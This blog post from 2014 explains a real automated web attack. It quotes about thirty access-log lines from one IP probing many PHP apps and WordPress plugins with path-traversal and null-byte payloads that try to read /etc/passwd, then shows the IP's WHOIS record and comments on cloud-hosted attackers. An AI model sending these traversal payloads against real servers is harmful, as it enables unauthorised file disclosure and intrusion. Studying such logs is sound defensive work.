Le blog de numerunique
→fr

A fine example of an L7 cyberattack
28/01/2014

What does a cyberattack look like in reality (and not like in the movies where a pretty skull appears on a computer screen)?

Well, like this:

107.23.240.63 - - [27/Jan/2014:23:17:28 +0100] "GET /KikChat/private.php?name=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 500 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:28 +0100] "GET /private.php?name=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 492 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:28 +0100] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 554 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:28 +0100] "GET /I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 550 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:29 +0100] "GET /index.php?page=../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 1848 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:29 +0100] "GET /gwebmail/?module=../../../../etc/passwd%00 HTTP/1.0" 404 490 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:29 +0100] "GET /?module=../../../../etc/passwd%00 HTTP/1.0" 200 1848 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:29 +0100] "GET /spywall/languageTest.php?&language=../../../../../../../../etc/passwd%00 HTTP/1.0" 404 505 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:29 +0100] "GET /languageTest.php?&language=../../../../../../../../etc/passwd%00 HTTP/1.0" 404 497 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:29 +0100] "GET /spywall/releasenotes.php?relfile=../../../../../etc/passwd%00 HTTP/1.0" 404 505 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:30 +0100] "GET /releasenotes.php?relfile=../../../../../etc/passwd%00 HTTP/1.0" 404 497 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:30 +0100] "GET /asaancart%20v-0.9/libs/smarty_ajax/index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0" 404 523 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:31 +0100] "GET /smarty_ajax/index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0" 404 502 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:31 +0100] "GET /index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0" 200 1848 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:31 +0100] "GET /acp/index.php?p=../../../../../../../etc/passwd%00 HTTP/1.0" 404 494 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:31 +0100] "GET /index.php?p=../../../../../../../etc/passwd%00 HTTP/1.0" 200 1848 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:32 +0100] "GET /frontend/js.php?module=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 496 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:32 +0100] "GET /js.php?module=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 487 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:32 +0100] "GET /index.php?xajax=SelTheme&xajaxargs[]=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 1848 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:32 +0100] "GET /index.php?option=com_rsappt_pro2&view=../../../../../../etc/passwd%0000 HTTP/1.0" 200 1848 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:34 +0100] "GET /sessions.php?globalIncludeFilePath=../../../../../../etc/passwd%0000 HTTP/1.0" 404 493 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:34 +0100] "GET /idoit/controller.php?load=&lang=../../../../../../etc/passwd%00 HTTP/1.0" 404 501 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:34 +0100] "GET /controller.php?load=&lang=../../../../../../etc/passwd%00 HTTP/1.0" 404 495 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:35 +0100] "GET /jcow/index.php?p=../../../../../../etc/passwd%00 HTTP/1.0" 404 495 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:35 +0100] "GET /index.php?p=../../../../../../etc/passwd%00 HTTP/1.0" 200 1848 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:35 +0100] "GET /vanilla/index.php?p=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 498 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:35 +0100] "GET /wp-content/plugins/wp-custom-pages/wp-download.php?url=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 531 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:35 +0100] "GET /wp-content/plugins/old-post-spinner/logview.php?ops_file=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 528 "-" "-"

107.23.240.63 - - [27/Jan/2014:23:17:35 +0100] "GET /modules/maticmarket/deco/blanc/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 520 "-" "-"

The real traces of a cyberattack...

Pretty, isn't it?

The very small font size allows for an overview. Non-IT people wouldn't see more in larger font. Others will know how to access a more readable presentation.

The attack (85 attempts in 24 seconds at 23:17 last night) seeks to exploit security flaws to retrieve the file containing the server's passwords. They are in encrypted form, but this retrieved file could be comfortably subjected to intensive decoding processing and thus provide convenient access to the server targeted by the attack.

The attacker is identified by 107.23.240.63, its IP address. A more complete description can be easily obtained about it:

NetRange: 107.20.0.0 - 107.23.255.255

CIDR: 107.20.0.0/14

OriginAS:

NetName: AMAZON-EC2-8

NetHandle: NET-107-20-0-0-1

Parent: NET-107-0-0-0-0

NetType: Direct Assignment

Comment: The activity you have detected originates from a dynamic hosting environment.

Comment: For fastest response, please submit abuse reports at http://aws-portal.amazon.com/gp/aws/html-forms-controller/contactus/AWSAbuse

Comment: For more information regarding EC2 see:

Comment: http://ec2.amazonaws.com/

Comment: All reports MUST include:

Comment: * src IP

Comment: * dest IP (your IP)

Comment: * dest port

Comment: * Accurate date/timestamp and timezone of activity

Comment: * Intensity/frequency (short log extracts)

Comment: * Your contact details (phone and email) Without these we will be unable to identify the correct owner of the IP address at that point in time.

RegDate: 2011-05-03

Updated: 2012-03-02

Ref: http://whois.arin.net/rest/net/NET-107-20-0-0-1OrgName: Amazon.com, Inc.

OrgId: AMAZO-4

Address: Amazon Web Services, Elastic Compute Cloud, EC2

Address: 1200 12th Avenue South

City: Seattle

StateProv: WA

PostalCode: 98144

Country: US

RegDate: 2005-09-29

Updated: 2009-06-02

Comment: For details of this service please see

Comment: http://ec2.amazonaws.com/

Ref: http://whois.arin.net/rest/org/AMAZO-4

The attack is therefore carried out from a virtual server offered for rent to anyone on the "Cloud" by an American company based in Seattle. The description even provides indications on the procedure to use to report abuses, provided you reveal the details of your identity, of course!

The attack, undoubtedly carried out in parallel on thousands of other computers, certainly succeeded somewhere and provided the cyber-pirates with a new server to launch other attacks, for example. This is a very common activity nowadays and easily practiced with complete impunity.

And the "L7"?

"L7" means "level 7" here and refers to the highest layer of the ISO 7498 model. This abstract model designates a classification that is otherwise completely useless, but in this case, a "level 7 cyberattack" immediately sounds much more serious.

Previous | Next